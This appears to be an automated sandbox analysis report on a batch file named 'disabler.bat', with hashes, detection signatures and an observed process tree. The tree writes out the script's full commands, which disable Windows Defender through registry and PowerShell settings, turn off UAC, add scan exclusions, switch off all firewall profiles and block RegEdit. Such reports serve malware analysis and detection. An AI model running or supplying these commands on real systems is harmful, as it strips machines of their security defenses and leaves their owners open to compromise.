Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/01/2025, 05:12

General

  • Target

    disabler.bat

  • Size

    2KB

  • MD5

    c6aff26267067b25326560e96a81513f

  • SHA1

    e45b8c290c2e9cf625ce255f6d31dda440e3d61e

  • SHA256

    c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79

  • SHA512

    d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
        PID:2768
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:2824
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f
      2⤵
      PID:2760
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f
      2⤵
      PID:2688
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f
      2⤵
      PID:2692
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f
      2⤵
      PID:2244
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f
      2⤵
      PID:2976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
      2⤵
      • UAC bypass
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2852
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -PUAProtection Disabled"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2800
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -ScanScheduleDay 8"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1100
    • C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:1996
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
      2⤵
      • Disables RegEdit via registry modification
      PID:548

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize
    7KB

    MD5
    ba82edd25c65cb9256d9250fdc1ef4df

    SHA1
    dc079b101d43a9f11f4dc0db060aefbe9b05c05e

    SHA256
    915a13ceb17014ef3cf432157a2c88bc019a2129bf43015750bc86d1b5080a08

    SHA512
    d1d6c8b9c468412c65fc6fbac90f69db30e7363c22340cc7f9f9a5840a30ad0d503dfbd2734ba0a997eeec90ad78ec983541afffe31a9fba497dc653ccaa2433

  • memory/2612-12-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

    Filesize
    2.9MB

  • memory/2612-13-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize
    32KB

  • memory/2852-4-0x0000000002D00000-0x0000000002D80000-memory.dmp

    Filesize
    512KB

  • memory/2852-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

    Filesize
    2.9MB

  • memory/2852-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize
    32KB